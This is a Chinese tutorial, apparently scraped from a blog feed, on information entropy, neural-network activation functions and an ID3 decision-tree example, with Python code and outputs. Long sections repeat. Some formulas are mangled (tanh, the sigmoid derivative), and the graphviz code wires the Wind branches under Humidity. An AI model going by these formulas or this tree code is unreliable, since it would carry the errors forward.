    x = np.random.randint(200,size=10)
    x = np.unique(x)
    x = x / np.sum(x)
    print("非均匀分布的概率分布:", x)

    # output information entropy of uniform probility and random probility
    print("非均匀分布对应的信息熵:", np.sum(-1 * x * np.log2(x)))
    print("均匀分布的信息熵:", -1 * np.log2(1 / len(x)))
    非均匀分布的概率分布: [0.01567749 0.02239642 0.07950728 0.10302352 0.11422172 0.11870101 0.13549832 0.20044793 0.21052632]非均匀分布对应的信息熵: 2.8962045966225145均匀分布的信息熵: 3.1699250014423126

    11.2 激活函数

    11.2 激活函数的概念

    每一个神经元有一个激活函数, 作用于本神经元的输入, 产生输出如下:

    $f(x)=f(\Sigma _ i \omega _ i x _ i + b)$

    如果没有激活函数或激活函数是线性的, 即$f(x)=x$, 网络计算能力就相当有限.

    使用非线性激活函数, 可以将线性作用变成非线性作用, 以获得描述复杂的表单数据, 具有学习复杂事务的能力

    11.2.2 常见的几种激活函数

    Sigmoid 函数

    $f(x)=\frac{1}{1+e^{-x}}$

    $f’(x)=f(x)\left[ 1-f(x) \right]=\frac{1}{ex(\frac{1}{ex}+1)^2}$

    import numpy as np
    import matplotlib.pyplot as plt
    # matplotlib.ticker.MultipleLocatorclass 用于为视图间隔内的基数的每个整数倍设置刻度。
    from matplotlib.ticker import MultipleLocator, FormatStrFormatter


    def sigmoid(x):
    return 1 / (1 + np.exp(-x))


    def sigmoid_derivative(x):
    return sigmoid(x) * (1 - sigmoid(x))


    plt.figure(figsize=(8, 5), dpi=80)
    ax = plt.subplot(111)
    ax.spines['right'].set_color('none')
    ax.spines['top'].set_color('none')
    ax.xaxis.set_ticks_position('bottom')
    ax.spines['bottom'].set_position(('data', 0))
    ax.yaxis.set_ticks_position('left')
    ax.spines['left'].set_position(('data', 0))
    ax.yaxis.set_ticks([0.2, 0.4, 0.6, 0.8, 1.0])
    ax.xaxis.set_minor_locator(MultipleLocator(0.5))
    ax.yaxis.set_minor_locator(MultipleLocator(0.1))

    X = np.linspace(-10, 10, 201, endpoint=True)
    print("X: ", X)

    Y1 = sigmoid(X)
    plt.plot(X, Y1, color="green", linewidth=2, label="sigmoid funciton")

    Y2 = sigmoid_derivative(X)
    plt.plot(X, Y2, color="red", linewidth=2, linestyle="dashed", label="sigmoid derivative funciton")

    ax.set_title("sigmoid function & sigmoid derivative funciton", fontsize=16)
    plt.legend()
    plt.show()
    X:  [-10.   -9.9  -9.8  -9.7  -9.6  -9.5  -9.4  -9.3  -9.2  -9.1  -9.   -8.9  -8.8  -8.7  -8.6  -8.5  -8.4  -8.3  -8.2  -8.1  -8.   -7.9  -7.8  -7.7  -7.6  -7.5  -7.4  -7.3  -7.2  -7.1  -7.   -6.9  -6.8  -6.7  -6.6  -6.5  -6.4  -6.3  -6.2  -6.1  -6.   -5.9  -5.8  -5.7  -5.6  -5.5  -5.4  -5.3  -5.2  -5.1  -5.   -4.9  -4.8  -4.7  -4.6  -4.5  -4.4  -4.3  -4.2  -4.1  -4.   -3.9  -3.8  -3.7  -3.6  -3.5  -3.4  -3.3  -3.2  -3.1  -3.   -2.9  -2.8  -2.7  -2.6  -2.5  -2.4  -2.3  -2.2  -2.1  -2.   -1.9  -1.8  -1.7  -1.6  -1.5  -1.4  -1.3  -1.2  -1.1  -1.   -0.9  -0.8  -0.7  -0.6  -0.5  -0.4  -0.3  -0.2  -0.1   0.    0.1   0.2   0.3   0.4   0.5   0.6   0.7   0.8   0.9   1.    1.1   1.2   1.3   1.4   1.5   1.6   1.7   1.8   1.9   2.    2.1   2.2   2.3   2.4   2.5   2.6   2.7   2.8   2.9   3.    3.1   3.2   3.3   3.4   3.5   3.6   3.7   3.8   3.9   4.    4.1   4.2   4.3   4.4   4.5   4.6   4.7   4.8   4.9   5.    5.1   5.2   5.3   5.4   5.5   5.6   5.7   5.8   5.9   6.    6.1   6.2   6.3   6.4   6.5   6.6   6.7   6.8   6.9   7.    7.1   7.2   7.3   7.4   7.5   7.6   7.7   7.8   7.9   8.    8.1   8.2   8.3   8.4   8.5   8.6   8.7   8.8   8.9   9.    9.1   9.2   9.3   9.4   9.5   9.6   9.7   9.8   9.9  10. ]

    png

    • 能够把输入的连续实值压缩到[0, 1]区间上有助于输出值的收敛

    • 会出现梯度消失情况, $\lim _ {x\to \infty}f’(x) = 0$

    • 非原点中心对称, 不利于下层的计算(可以直接-0.5?)

    • 含有幂运算, 相对耗时较长

    tanh 函数

    $f(x)=\frac{e^x - e{-x}}{ex + e^{-x}}$

    $f’(x) = 1 - \tanh^2x$

    import numpy as np
    import matplotlib.pyplot as plt
    from matplotlib.ticker import MultipleLocator, FormatStrFormatter


    def tanh(x):
    return (np.exp(x) - np.exp(-x)) / (np.exp(x) + np.exp(-x))


    def tanh_derivative(x):
    return 1 - tanh(x) * tanh(x)


    plt.figure(figsize=(8, 5), dpi=80)
    ax = plt.subplot(111)
    ax.spines['right'].set_color('none')
    ax.spines['top'].set_color('none')
    ax.xaxis.set_ticks_position('bottom')
    ax.spines['bottom'].set_position(('data', 0))
    ax.yaxis.set_ticks_position('left')
    ax.spines['left'].set_position(('data', 0))
    ax.yaxis.set_ticks([0.2, 0.4, 0.6, 0.8, 1.0])
    ax.xaxis.set_minor_locator(MultipleLocator(0.5))
    ax.yaxis.set_minor_locator(MultipleLocator(0.1))

    X = np.linspace(-10, 10, 201, endpoint=True)
    print("X: ", X)

    Y1 = tanh(X)
    plt.plot(X, Y1, color="green", linewidth=2, label="tanh funciton")

    Y2 = tanh_derivative(X)
    plt.plot(X, Y2, color="red", linewidth=2, linestyle="dashed", label="tanh derivative funciton")

    ax.set_title("tanh function & tanh derivative funciton", fontsize=16)
    plt.legend()
    plt.show()
    X:  [-10.   -9.9  -9.8  -9.7  -9.6  -9.5  -9.4  -9.3  -9.2  -9.1  -9.   -8.9  -8.8  -8.7  -8.6  -8.5  -8.4  -8.3  -8.2  -8.1  -8.   -7.9  -7.8  -7.7  -7.6  -7.5  -7.4  -7.3  -7.2  -7.1  -7.   -6.9  -6.8  -6.7  -6.6  -6.5  -6.4  -6.3  -6.2  -6.1  -6.   -5.9  -5.8  -5.7  -5.6  -5.5  -5.4  -5.3  -5.2  -5.1  -5.   -4.9  -4.8  -4.7  -4.6  -4.5  -4.4  -4.3  -4.2  -4.1  -4.   -3.9  -3.8  -3.7  -3.6  -3.5  -3.4  -3.3  -3.2  -3.1  -3.   -2.9  -2.8  -2.7  -2.6  -2.5  -2.4  -2.3  -2.2  -2.1  -2.   -1.9  -1.8  -1.7  -1.6  -1.5  -1.4  -1.3  -1.2  -1.1  -1.   -0.9  -0.8  -0.7  -0.6  -0.5  -0.4  -0.3  -0.2  -0.1   0.    0.1   0.2   0.3   0.4   0.5   0.6   0.7   0.8   0.9   1.    1.1   1.2   1.3   1.4   1.5   1.6   1.7   1.8   1.9   2.    2.1   2.2   2.3   2.4   2.5   2.6   2.7   2.8   2.9   3.    3.1   3.2   3.3   3.4   3.5   3.6   3.7   3.8   3.9   4.    4.1   4.2   4.3   4.4   4.5   4.6   4.7   4.8   4.9   5.    5.1   5.2   5.3   5.4   5.5   5.6   5.7   5.8   5.9   6.    6.1   6.2   6.3   6.4   6.5   6.6   6.7   6.8   6.9   7.    7.1   7.2   7.3   7.4   7.5   7.6   7.7   7.8   7.9   8.    8.1   8.2   8.3   8.4   8.5   8.6   8.7   8.8   8.9   9.    9.1   9.2   9.3   9.4   9.5   9.6   9.7   9.8   9.9  10. ]

    png

    • 关于原点中心对称, 收敛较好

    • 存在梯度消失问题

    • 含有幂运算, 相对耗时

    ReLU 函数

    $f(x) = max(0, x)$

    $f’(x) = \left{\begin{matrix}
    1,x>0
    \ 0,x\le0
    \end{matrix}\right.$

    import numpy as np
    import matplotlib.pyplot as plt
    from matplotlib.ticker import MultipleLocator, FormatStrFormatter


    def relu(x):
    return np.where(x <= 0, 0, x)


    def relu_derivative(x):
    return np.where(x <= 0, 0, 1)


    plt.figure(figsize=(8, 5), dpi=80)
    plt.xlim(-1.5, 1.5)
    plt.ylim(0, 1)
    ax = plt.subplot(111)
    ax.spines['right'].set_color('none')
    ax.spines['top'].set_color('none')
    ax.xaxis.set_ticks_position('bottom')
    ax.spines['bottom'].set_position(('data', 0))
    ax.yaxis.set_ticks_position('left')
    ax.spines['left'].set_position(('data', 0))
    ax.yaxis.set_ticks(np.arange(0, 1.4, 0.2))
    ax.xaxis.set_minor_locator(MultipleLocator(0.5))
    ax.yaxis.set_minor_locator(MultipleLocator(0.1))

    X = np.linspace(-10, 10, 201, endpoint=True)
    print("X: ", X)

    Y1 = relu(X)
    plt.plot(X, Y1, color="green", linewidth=2, label="ReLU funciton")

    Y2 = relu_derivative(X)
    plt.plot(X, Y2, color="red", linewidth=2, linestyle="dashed", label="ReLU derivative funciton")

    ax.set_title("ReLU function & ReLU derivative funciton", fontsize=16)
    plt.legend()
    plt.show()
    X:  [-10.   -9.9  -9.8  -9.7  -9.6  -9.5  -9.4  -9.3  -9.2  -9.1  -9.   -8.9  -8.8  -8.7  -8.6  -8.5  -8.4  -8.3  -8.2  -8.1  -8.   -7.9  -7.8  -7.7  -7.6  -7.5  -7.4  -7.3  -7.2  -7.1  -7.   -6.9  -6.8  -6.7  -6.6  -6.5  -6.4  -6.3  -6.2  -6.1  -6.   -5.9  -5.8  -5.7  -5.6  -5.5  -5.4  -5.3  -5.2  -5.1  -5.   -4.9  -4.8  -4.7  -4.6  -4.5  -4.4  -4.3  -4.2  -4.1  -4.   -3.9  -3.8  -3.7  -3.6  -3.5  -3.4  -3.3  -3.2  -3.1  -3.   -2.9  -2.8  -2.7  -2.6  -2.5  -2.4  -2.3  -2.2  -2.1  -2.   -1.9  -1.8  -1.7  -1.6  -1.5  -1.4  -1.3  -1.2  -1.1  -1.   -0.9  -0.8  -0.7  -0.6  -0.5  -0.4  -0.3  -0.2  -0.1   0.    0.1   0.2   0.3   0.4   0.5   0.6   0.7   0.8   0.9   1.    1.1   1.2   1.3   1.4   1.5   1.6   1.7   1.8   1.9   2.    2.1   2.2   2.3   2.4   2.5   2.6   2.7   2.8   2.9   3.    3.1   3.2   3.3   3.4   3.5   3.6   3.7   3.8   3.9   4.    4.1   4.2   4.3   4.4   4.5   4.6   4.7   4.8   4.9   5.    5.1   5.2   5.3   5.4   5.5   5.6   5.7   5.8   5.9   6.    6.1   6.2   6.3   6.4   6.5   6.6   6.7   6.8   6.9   7.    7.1   7.2   7.3   7.4   7.5   7.6   7.7   7.8   7.9   8.    8.1   8.2   8.3   8.4   8.5   8.6   8.7   8.8   8.9   9.    9.1   9.2   9.3   9.4   9.5   9.6   9.7   9.8   9.9  10. ]

    png

    • 解决梯度消失的问题

    • 计算速度快

    • 非原点对称, 会影响收敛速度(但是比 Sigmoid 和 tanh 快)

    • 输入值小于 0 时, 永远不会被激活

    Leaky ReLU (PReLU)
    • 解决 ReLU 算法在 x 轴负方向为 0 可能导致部分神经元无法激活的问题

    • 理论上具有 ReLU 的所有优点

    $f(x)=max(\alpha x, x)$($\alpha$通常取 0.01)

    $f(x)=max(0.01x, x)$

    $f(x)=\left{\begin{matrix}
    1,x>0
    \ 0.01,x\le0
    \end{matrix}\right.$

    import numpy as np
    import matplotlib.pyplot as plt
    from matplotlib.ticker import MultipleLocator, FormatStrFormatter


    def prelu(x):
    return np.where(x <= 0, 0.01 * x, x)


    def prelu_derivative(x):
    return np.where(x <= 0, 0.01, 1)


    plt.figure(figsize=(8, 5), dpi=80)
    plt.xlim(-1.5, 1.5)
    plt.ylim(0, 1)
    ax = plt.subplot(111)
    ax.spines['right'].set_color('none')
    ax.spines['top'].set_color('none')
    ax.xaxis.set_ticks_position('bottom')
    ax.spines['bottom'].set_position(('data', 0))
    ax.yaxis.set_ticks_position('left')
    ax.spines['left'].set_position(('data', 0))
    ax.yaxis.set_ticks(np.arange(0, 1.4, 0.2))
    ax.xaxis.set_minor_locator(MultipleLocator(0.5))
    ax.yaxis.set_minor_locator(MultipleLocator(0.1))

    X = np.linspace(-10, 10, 201, endpoint=True)
    print("X: ", X)

    Y1 = prelu(X)
    plt.plot(X, Y1, color="green", linewidth=2, label="PReLU funciton")

    Y2 = prelu_derivative(X)
    plt.plot(X, Y2, color="red", linewidth=2, linestyle="dashed", label="PReLU derivative funciton")

    ax.set_title("PReLU function & PReLU derivative funciton", fontsize=16)
    plt.legend()
    plt.show()
    X:  [-10.   -9.9  -9.8  -9.7  -9.6  -9.5  -9.4  -9.3  -9.2  -9.1  -9.   -8.9  -8.8  -8.7  -8.6  -8.5  -8.4  -8.3  -8.2  -8.1  -8.   -7.9  -7.8  -7.7  -7.6  -7.5  -7.4  -7.3  -7.2  -7.1  -7.   -6.9  -6.8  -6.7  -6.6  -6.5  -6.4  -6.3  -6.2  -6.1  -6.   -5.9  -5.8  -5.7  -5.6  -5.5  -5.4  -5.3  -5.2  -5.1  -5.   -4.9  -4.8  -4.7  -4.6  -4.5  -4.4  -4.3  -4.2  -4.1  -4.   -3.9  -3.8  -3.7  -3.6  -3.5  -3.4  -3.3  -3.2  -3.1  -3.   -2.9  -2.8  -2.7  -2.6  -2.5  -2.4  -2.3  -2.2  -2.1  -2.   -1.9  -1.8  -1.7  -1.6  -1.5  -1.4  -1.3  -1.2  -1.1  -1.   -0.9  -0.8  -0.7  -0.6  -0.5  -0.4  -0.3  -0.2  -0.1   0.    0.1   0.2   0.3   0.4   0.5   0.6   0.7   0.8   0.9   1.    1.1   1.2   1.3   1.4   1.5   1.6   1.7   1.8   1.9   2.    2.1   2.2   2.3   2.4   2.5   2.6   2.7   2.8   2.9   3.    3.1   3.2   3.3   3.4   3.5   3.6   3.7   3.8   3.9   4.    4.1   4.2   4.3   4.4   4.5   4.6   4.7   4.8   4.9   5.    5.1   5.2   5.3   5.4   5.5   5.6   5.7   5.8   5.9   6.    6.1   6.2   6.3   6.4   6.5   6.6   6.7   6.8   6.9   7.    7.1   7.2   7.3   7.4   7.5   7.6   7.7   7.8   7.9   8.    8.1   8.2   8.3   8.4   8.5   8.6   8.7   8.8   8.9   9.    9.1   9.2   9.3   9.4   9.5   9.6   9.7   9.8   9.9  10. ]

    png

    11.3 综合案例——分类算法中信息熵的应用

    用 ID3 分类算法, 按照信息熵的减少幅度来确定分类的方向

    import pandas as pd
    import numpy as np

    data = [np.array(["Sunny", "Hot", "High", "Weak", "No"])]
    data.append(np.array(["Sunny", "Hot", "High", "Strong", "No"]))
    data.append(np.array(["Overcast", "Hot", "High", "Weak", "Yes"]))
    data.append(np.array(["Rain", "Mild", "High", "Weak", "Yes"]))
    data.append(np.array(["Rain", "Cool", "Normal", "Weak", "Yes"]))
    data.append(np.array(["Rain", "Cool", "Normal", "Strong", "No"]))
    data.append(np.array(["Overcast", "Cool", "Normal", "Strong", "Yes"]))
    data.append(np.array(["Sunny", "Mild", "High", "Weak", "No"]))
    data.append(np.array(["Sunny", "Cool", "Normal", "Weak", "Yes"]))
    data.append(np.array(["Rain", "Mild", "Normal", "Weak", "Yes"]))
    data.append(np.array(["Sunny", "Mild", "Normal", "Strong", "Yes"]))
    data.append(np.array(["Overcast", "Mild", "High", "Strong", "Yes"]))
    data.append(np.array(["Overcast", "Hot", "Normal", "Weak", "Yes"]))
    data.append(np.array(["Rain", "Mild", "High", "Strong", "No"]))
    df = pd.DataFrame(data, columns = ["Outlook", "Temp.",
    "Humidity", "Wind", "Decision"], index=range(1, 15))
    df.index.name = 'Day'
    df
    Outlook Temp. Humidity Wind Decision
    Day
    1 Sunny Hot High Weak No
    2 Sunny Hot High Strong No
    3 Overcast Hot High Weak Yes
    4 Rain Mild High Weak Yes
    5 Rain Cool Normal Weak Yes
    6 Rain Cool Normal Strong No
    7 Overcast Cool Normal Strong Yes
    8 Sunny Mild High Weak No
    9 Sunny Cool Normal Weak Yes
    10 Rain Mild Normal Weak Yes
    11 Sunny Mild Normal Strong Yes
    12 Overcast Mild High Strong Yes
    13 Overcast Hot Normal Weak Yes
    14 Rain Mild High Strong No
    名称解释
    Day日期
    OutLook阴晴
    Temp.气温
    Humidity湿度
    Wind风力
    Decision目标列/标识列
    (1) 数据集的信息熵的计算

    $H(D)=-\Sigma^2 _ {k=1}\frac{|C _ k|}{|D|}\log _ 2 \frac{C _ k}{|D|}$

    $= - \frac{|C _ {yes}|}{|D|}\log _ 2\frac{|C _ {yes}|}{|D|} - \frac{|C _ {no}|}{|D|} \log _ 2\frac{|C _ {no}|}{|D|}$

    $|D|=14,|C _ {yes}|=9, |C _ {no}|=5$

    $H(D)=-\frac{9}{14}\log _ 2 \frac{9}{14} - \frac{5}{14}\log _ 2 \frac{5}{14}= 0.940$

    D = len(df)
    C_yes = len(df[df.Decision == "Yes"])
    C_no = len(df[df.Decision == "No"])
    H_D = - (C_yes / D) * np.log2(C_yes / D) - (C_no / D) * np.log2(C_no / D)
    H_D
    0.9402859586706311
    (2) 对数据集进行分类之后的信息熵

    按照某一属性 A:

    $H(D|A)=\Sigma^n _ {i=1}\frac{|D _ i|}{|D|}H(D _ i)=-\Sigma^n _ {i=1}\frac{|D _ i|}{|D|}\Sigma^K _ {k=1}\frac{|C _{ik}|}{|D _ i|}\log _2\frac{|D _{ik}|}{|D _ i|}$

    针对某一属性 A, 分类后不确定性减少, 由此产生的信息增益:

    $g(D|A)=H(D)-H(D|A)$

    属性 Wind 的信息熵:

    $H(D|Wind)=\Sigma^n _ {i=1}\frac{|D _ i|}{|D|}H(D _ i)=\frac{|D _ {strong}|}{|D|}H(D _ {strong}) + \frac{|D _ {weak}|}{|D|}H(D _ {weak})$

    对于 Wind=Strong 的数据集的信息熵:

    $H(D _ {strong})=\Sigma^2 _ {k=1}\frac{|C _ {strong,k}|}{|D _ {strong}|}\log _ 2\frac{|C _ {strong,k}|}{|D _ {strong}|}$

    $=-\frac{|C _ {strong,yes}|}{|D _ {strong}|}\log _ 2\frac{|C _ {strong,yes}|}{|D _ {strong}|}-\frac{|C _ {strong,no}|}{|D _ {strong}|}\log _ 2\frac{|C _ {strong,no}|}{|D _ {strong}|}$

    $=-\frac{3}{6}\log _ 2\frac{3}{6}-\frac{3}{6}\log _ 2\frac{3}{6}=1$

    D_strong = len(df[df.Wind == "Strong"])
    C_strong_yes = len(df[(df.Wind == "Strong") & (df.Decision == "Yes")])
    C_strong_no = len(df[(df.Wind == "Strong") & (df.Decision == "No")])
    H_D_strong = -(C_strong_yes / D_strong) * np.log2(C_strong_yes / D_strong) - \
    (C_strong_no / D_strong) * np.log2(C_strong_no / D_strong)
    H_D_strong
    1.0
    D_weak = len(df[df.Wind == "Weak"])
    C_weak_yes = len(df[(df.Wind == "Weak") & (df.Decision == "Yes")])
    C_weak_no = len(df[(df.Wind == "Weak") & (df.Decision == "No")])
    H_D_weak = -(C_weak_yes / D_weak) * np.log2(C_weak_yes / D_weak) - \
    (C_weak_no / D_weak) * np.log2(C_weak_no / D_weak)
    H_D_weak
    0.8112781244591328
    H_D_Wind = D_strong / D * H_D_strong + D_weak / D * H_D_weak
    H_D_Wind
    0.8921589282623617

    $g(D|Wind)=H(D)-H(D|Wind)=0.940-0.892=0.048$

    H_D - H_D_Wind
    0.04812703040826949

    同理,

    $g(D|Outlook)=0.246$

    $g(D|Temp)=0.029$

    $g(D|Humidity)=0.151$

    ID3 算法是一种贪心算法,用来构造决策树。ID3 算法起源于概念学习系统(CLS),以信息熵的下降速度为选取测试属性的标准,即在每个节点选取还尚未被用来划分的具有最高信息增益的属性作为划分标准,然后继续这个过程,直到生成的决策树能完美分类训练样例。ID3 算法_百度百科

    pip install graphviz
    Collecting graphviz  Using cached graphviz-0.20-py3-none-any.whl (46 kB)Installing collected packages: graphvizSuccessfully installed graphviz-0.20Note: you may need to restart the kernel to use updated packages.
    from PIL import Image
    import matplotlib.pyplot as plt
    from graphviz import Digraph

    # 实例化一个 Digraph 对象(有向图),name:生成的图片的图片名,format:生成的图片格式
    dot = Digraph(name="test", comment="the test", format="png")

    # 生成图片节点,name:这个节点对象的名称,label:节点名,color:画节点的线的颜色
    dot.node(name='Outlook', shape="record", label='Outlook')
    dot.node(name='Overcast', shape="plaintext", label='Overcast')
    dot.node(name='Yes1', shape="plaintext", label='Yes')

    dot.node(name='Humidity', shape="record", label='Humidity')
    dot.node(name='Yes2', shape="plaintext", label='Yes')
    dot.node(name='No1', shape="plaintext", label='No')

    dot.node(name='Wind', shape="record", label='Wind')
    dot.node(name='Yes3', shape="plaintext", label='Yes')
    dot.node(name='No2', shape="plaintext", label='No')

    # 在节点之间画线,label:线上显示的文本,color:线的颜色
    dot.edge('Outlook', 'Humidity', arrowhead="none", label="Sunny")
    dot.edge('Humidity', 'No1', arrowhead="none", label="High")
    dot.edge('Humidity', 'Yes2', arrowhead="none", label="Normal")
    dot.edge('Outlook', 'Overcast', arrowhead="none")
    dot.edge('Overcast', 'Yes1', arrowhead="none")
    dot.edge('Outlook', 'Wind', arrowhead="none", label="Rain")
    dot.edge('Humidity', 'No2', arrowhead="none", label="Strong")
    dot.edge('Humidity', 'Yes3', arrowhead="none", label="Weak")

    dot.render(filename='test', view=False)

    plt.figure()
    img = Image.open("test.png")
    plt.imshow(img)
    plt.axis('off')
    plt.show()

    png

    ID3 决策树分类算法的结果

    不太会画, 先这样吧…

    ]]>
    + 正文

    11 熵与激活函数

    11.1 熵和信息熵

    11.1 熵的概念

    【毕导】你会点进这个视频,并一脸懵逼地出去,而这一切已被物理规律注定了

    简单认识熵,一看就会的那种

    11.2 信息熵的概念

    如何理解信息熵

    科学证明中文就是最最最高级的!【硬核科普】信息熵是什么

    中文是最有效率的语言吗?-- 信息熵简谈

    如果 对一条信息越难预测$\to$信息量就越高$\to$信息熵就越高

    $\color{Purple}{H(P _ 1, P _ 2,…, P _ n)} = - \lambda\color{Green}{\Sigma^n _ {i=1}}\color{Blue}{P _ i} \color{Red}{\log(P _ i)}$

    信息熵等于对单个符号对应的信息量(不确定性), 乘以它出现的概率, 再求和(单个符号不确定性的平均值)

    11.1.3 应用 Python 函数库计算信息熵

    (1) 均匀分布事件的不确定性计算和信息熵计算
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    import numpy as np
    import matplotlib.pyplot as plt

    plt.figure(figsize=(8, 5), dpi=80)
    ax = plt.subplot(111)
    ax.spines['right'].set_color('none') # 隐藏右边的边框
    ax.spines['top'].set_color('none')
    ax.xaxis.set_ticks_position('bottom')
    ax.spines['bottom'].set_position(('data', 0))
    ax.yaxis.set_ticks_position('left')
    ax.spines['left'].set_position(('data', 0))
    ax.yaxis.set_ticks([1, 2, 3, 4, 5, 6])

    # 定义均匀分布 U[0, 1]
    X = np.linspace(0, 1, 101, endpoint=True)
    X = X[1:100]
    print(X)

    # 计算不确定性
    Y = -1 * X * np.log2(X)
    print("概率值为{}时信息熵分量(单个符号的不确定性)达到最大值{}".format(X[np.argmax(Y)], np.max(Y)))

    plt.plot(X, Y, color="green", linewidth=2, label="p * log2(p)")
    plt.scatter(X[np.argmax(Y)], np.max(Y), color="black")
    plt.text(X[np.argmax(Y)], np.max(Y) + 0.2, "({}, {})".format(X[np.argmax(Y)], np.round(np.max(Y), 2)))

    # 计算信息熵
    Y = -1 * np.log2(X)
    plt.plot(X, Y, color="red", linestyle="dashed", label="log2(p)")

    plt.scatter(0.5, 1, color="black")
    plt.text(0.5, 1.2, "(0.5, 1.0)")

    plt.legend() # 显示图例标注
    plt.show()
    [0.01 0.02 0.03 0.04 0.05 0.06 0.07 0.08 0.09 0.1  0.11 0.12 0.13 0.14 0.15 0.16 0.17 0.18 0.19 0.2  0.21 0.22 0.23 0.24 0.25 0.26 0.27 0.28 0.29 0.3  0.31 0.32 0.33 0.34 0.35 0.36 0.37 0.38 0.39 0.4  0.41 0.42 0.43 0.44 0.45 0.46 0.47 0.48 0.49 0.5  0.51 0.52 0.53 0.54 0.55 0.56 0.57 0.58 0.59 0.6  0.61 0.62 0.63 0.64 0.65 0.66 0.67 0.68 0.69 0.7 0.71 0.72 0.73 0.74 0.75 0.76 0.77 0.78 0.79 0.8  0.81 0.82 0.83 0.84 0.85 0.86 0.87 0.88 0.89 0.9  0.91 0.92 0.93 0.94 0.95 0.96 0.97 0.98 0.99]概率值为 0.37 时信息熵分量(单个符号的不确定性)达到最大值 0.5307290449339367

    png

    $f(x)=xlog2(x)$

    $f’(x)=\frac{lnx+1}{ln2}$

    $f’(x)=0\to x=\frac{1}{e}\approx 0.37$

    • (选择到某一个事件的)概率不断增加时, 事情的状态越来越确定, 不确定性越来越小, (单个符号不确定性的平均值)信息熵也越来越小

    • 对于两个状态的均匀分布(两种状态对应的概率都为 0.5, 如抛硬币), 信息熵为 1

    • 当概率变为 1 时, 事情已经完全确定, 结果不会有任何变化, 此时信息熵变为 0

    • 熵可以应用到分类任务中, 熵值越低分类效果越好

    • 熵可以衡量两个指标对结果的影响大小, 熵值越小的指标对结果的影响更大

    (2) 均匀分布的信息熵和非均匀分布的信息熵

    对同一个随机事件, 均匀分布时的信息熵是最大的

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    import numpy as np

    # create some probilities with the sum = 1
    np.random.seed(42)
    x = np.random.randint(200,size=10)
    x = np.unique(x)
    x = x / np.sum(x)
    print("非均匀分布的概率分布:", x)

    # output information entropy of uniform probility and random probility
    print("非均匀分布对应的信息熵:", np.sum(-1 * x * np.log2(x)))
    print("均匀分布的信息熵:", -1 * np.log2(1 / len(x)))
    非均匀分布的概率分布: [0.01567749 0.02239642 0.07950728 0.10302352 0.11422172 0.11870101 0.13549832 0.20044793 0.21052632]非均匀分布对应的信息熵: 2.8962045966225145均匀分布的信息熵: 3.1699250014423126

    11.2 激活函数

    11.2 激活函数的概念

    每一个神经元有一个激活函数, 作用于本神经元的输入, 产生输出如下:

    $f(x)=f(\Sigma _ i \omega _ i x _ i + b)$

    如果没有激活函数或激活函数是线性的, 即$f(x)=x$, 网络计算能力就相当有限.

    使用非线性激活函数, 可以将线性作用变成非线性作用, 以获得描述复杂的表单数据, 具有学习复杂事务的能力

    11.2.2 常见的几种激活函数

    Sigmoid 函数

    $f(x)=\frac{1}{1+e^{-x}}$

    $f’(x)=f(x)\left[ 1-f(x) \right]=\frac{1}{ex(\frac{1}{ex}+1)^2}$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    import numpy as np
    import matplotlib.pyplot as plt
    # matplotlib.ticker.MultipleLocatorclass 用于为视图间隔内的基数的每个整数倍设置刻度。
    from matplotlib.ticker import MultipleLocator, FormatStrFormatter


    def sigmoid(x):
    return 1 / (1 + np.exp(-x))


    def sigmoid_derivative(x):
    return sigmoid(x) * (1 - sigmoid(x))


    plt.figure(figsize=(8, 5), dpi=80)
    ax = plt.subplot(111)
    ax.spines['right'].set_color('none')
    ax.spines['top'].set_color('none')
    ax.xaxis.set_ticks_position('bottom')
    ax.spines['bottom'].set_position(('data', 0))
    ax.yaxis.set_ticks_position('left')
    ax.spines['left'].set_position(('data', 0))
    ax.yaxis.set_ticks([0.2, 0.4, 0.6, 0.8, 1.0])
    ax.xaxis.set_minor_locator(MultipleLocator(0.5))
    ax.yaxis.set_minor_locator(MultipleLocator(0.1))

    X = np.linspace(-10, 10, 201, endpoint=True)
    print("X: ", X)

    Y1 = sigmoid(X)
    plt.plot(X, Y1, color="green", linewidth=2, label="sigmoid funciton")

    Y2 = sigmoid_derivative(X)
    plt.plot(X, Y2, color="red", linewidth=2, linestyle="dashed", label="sigmoid derivative funciton")

    ax.set_title("sigmoid function & sigmoid derivative funciton", fontsize=16)
    plt.legend()
    plt.show()
    X:  [-10.   -9.9  -9.8  -9.7  -9.6  -9.5  -9.4  -9.3  -9.2  -9.1  -9.   -8.9  -8.8  -8.7  -8.6  -8.5  -8.4  -8.3  -8.2  -8.1  -8.   -7.9  -7.8  -7.7  -7.6  -7.5  -7.4  -7.3  -7.2  -7.1  -7.   -6.9  -6.8  -6.7  -6.6  -6.5  -6.4  -6.3  -6.2  -6.1  -6.   -5.9  -5.8  -5.7  -5.6  -5.5  -5.4  -5.3  -5.2  -5.1  -5.   -4.9  -4.8  -4.7  -4.6  -4.5  -4.4  -4.3  -4.2  -4.1  -4.   -3.9  -3.8  -3.7  -3.6  -3.5  -3.4  -3.3  -3.2  -3.1  -3.   -2.9  -2.8  -2.7  -2.6  -2.5  -2.4  -2.3  -2.2  -2.1  -2.   -1.9  -1.8  -1.7  -1.6  -1.5  -1.4  -1.3  -1.2  -1.1  -1.   -0.9  -0.8  -0.7  -0.6  -0.5  -0.4  -0.3  -0.2  -0.1   0.    0.1   0.2   0.3   0.4   0.5   0.6   0.7   0.8   0.9   1.    1.1   1.2   1.3   1.4   1.5   1.6   1.7   1.8   1.9   2.    2.1   2.2   2.3   2.4   2.5   2.6   2.7   2.8   2.9   3.    3.1   3.2   3.3   3.4   3.5   3.6   3.7   3.8   3.9   4.    4.1   4.2   4.3   4.4   4.5   4.6   4.7   4.8   4.9   5.    5.1   5.2   5.3   5.4   5.5   5.6   5.7   5.8   5.9   6.    6.1   6.2   6.3   6.4   6.5   6.6   6.7   6.8   6.9   7.    7.1   7.2   7.3   7.4   7.5   7.6   7.7   7.8   7.9   8.    8.1   8.2   8.3   8.4   8.5   8.6   8.7   8.8   8.9   9.    9.1   9.2   9.3   9.4   9.5   9.6   9.7   9.8   9.9  10. ]

    png

    • 能够把输入的连续实值压缩到[0, 1]区间上有助于输出值的收敛

    • 会出现梯度消失情况, $\lim _ {x\to \infty}f’(x) = 0$

